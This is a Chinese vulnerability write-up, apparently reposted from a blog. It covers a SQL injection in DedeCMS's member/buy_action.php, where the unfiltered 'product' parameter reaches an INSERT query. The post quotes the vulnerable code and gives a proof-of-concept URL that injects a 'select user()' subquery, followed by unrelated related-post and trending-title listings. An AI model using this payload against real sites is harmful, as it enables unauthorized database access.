详细说明:
member/buy_action.php
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略XX行
if(empty($product))
{
ShowMsg("请选择一个产品!", 'javascript:;');
exit();
}
省略xxx行
=if(!isset($paytype))
{    
$inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
";
echo  $inquery."<br>" ;
漏洞证明:
测试方法
注册用户之后验证邮箱完了之后 打开
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然后在http://127.0.0.1/dedecms/member/operation.php
就可以查看到返回信息了

转载于:https://www.cnblogs.com/milantgh/p/3634519.html

Dedecms会员中心注入漏洞相关推荐

  1. member pm.php,Dedecms 会员中心注入漏洞5

    漏洞作者: Matt [php]member/pm.php else if($dopost=='read') { $sql = "SELECT * FROM `#@__member_frie ...

  2. php制作会员签到打开,【PHP】织梦dedecms会员中心模板带会员签到赚金币功能

    一:将member文件夹上传覆盖网站根目录 二:后台添加统一页头页尾调用模板(具体操作请见截图) 三:在系统-SQL命令行工具中运行一下SQL创建数据库: (此为utf-8) CREATE TABLE ...

  3. dedeCMS 会员中心注册登陆页面 - 模板修改

    dedeCMS 会员中心:注册登陆页面(logo.版权信息等)的修改问题 一. 模板文件路径及修改业务: 文件名 member\templets\ 涉及页面 修改业务 涉及图片名称 reg-new.h ...

  4. 织梦php版本图片不能上传,织梦Dedecms会员中心无法上传图片的解决方法

    织梦Dedecms会员中心,由于为了安全性问题,限制了注册会员在会员中心发布信息的时候上传图片,但是管理员登录会员中心发布信息的时候上传图片却不受影响.那该如何解决呢?下面我们来说明一下具体的解决方案 ...

  5. 织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞

    微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. Hackme论坛原创 转载请附带原文链接 作者: c4rp3nt3r ...

  6. 小刀娱乐网:dedecms 会员中心调用会员最后登录时间 和上次登录ip

    在会员中心的任意模板中可以调用以下自定义函数 <?php echo login_time_ip($cfg_ml->M_ID);?> 将以下函数放到include/extend.fun ...

  7. 织梦dedecms会员中心投稿,管理员审核后,文档稿件动态浏览,禁止生成静态页

    后台模型管理中,会员稿件默认状态,官方默认只有三个选项.如果选择投稿后未审核,那么.后台审核后,文档会自动生成静态页.没法动态浏览.解决办法是增加一个选项.如图 需要修改三个文件 一是,后台模板目录中 ...

  8. /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -

    DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...

  9. member.php?mod=register文件在哪里,DEDECMS修改member会员中心文件夹名称 更改member目录名称...

    DEDECMS做站过程中有时候不可避免被各种营销软件强行发布广告,因此为了避免这个情况,我们要嘛是加强注册审核,要嘛就是参考我们这篇文章,将会员中心文件夹完全改名,避免被特征扫描到. 下面是操作方法: ...

  10. album add.php 修复,dedecms SQL注入漏洞 member/album_add.php 修复

    dedecms的/dedecms/member/album_add.php文件中,对输入参数mtypesid未进行int整型转义,导致SQL注入的发生. 打开文件:/member/album_add. ...

最新文章

  1. 第21章:MongoDB-聚合操作--聚合管道--$geoNear
  2. 如何区分ABS和PVC光纤槽道?
  3. 效能改进之项目例会导入实践
  4. springboot入门_shiro
  5. Tomcat Filter 自己动手实现
  6. 浅析THINKPHP的addAll支持的最大数据量
  7. 同方自主可控系统服务器,自主可控 同方超强TR1210服务器!
  8. 使用Android studio 运行react-native项目
  9. 学习响应式BootStrap来写融职教育网站,Bootsrtap第十天你的收获
  10. Mac 开发使用中的小技巧收集
  11. Python基础-“百钱百鸡”入门逻辑题(刚开始的建议藏起来)
  12. 剑指offer面试题32 - II. 从上到下打印二叉树 II(二叉树)(BFS)
  13. 机器学习笔记 - 什么是支持向量回归(SVR)?
  14. mysql +cobar_数据库中间件Cobar功能探究
  15. 11月14日Fluent建模笔记
  16. Shiro 实现记住我功能
  17. 深入解析Scheduler
  18. 智能耳机测试软件,智能可穿戴设备有哪些?解析可穿戴设备的作用和测试
  19. 三星android平板,三星也不忘Android平板,或推带虹膜识别的Galaxy Tab S4
  20. 微信企业号和微信公众号使用js-sdk说明和注意事项

热门文章

  1. Windows Server 2012 R2 VDI系列(四)—创建虚拟桌面集合
  2. 基于QT4.8.3的手机操作系统,已完成QML语言的加入
  3. ADO.NET Entity Framework 实体框架映射方案
  4. c语言实现sbrk函数,菜鸟随笔(2)---brk()与sbrk()函数的学习与使用
  5. centos nginx php5.3,centos6.2+nginx-1.2.3+php-5.3.17装配脚本
  6. html模板引擎 字符串长度,javascript轻量级模板引擎juicer使用指南
  7. php mac windows,苹果电脑是windows系统吗
  8. [渝粤教育] 陕西国防工业职业技术学院 Android开发 参考 资料
  9. 【渝粤教育】国家开放大学2018年春季 0284-21T外国文学 参考试题
  10. Tensorflow相关学习笔记(一)GPU处理相关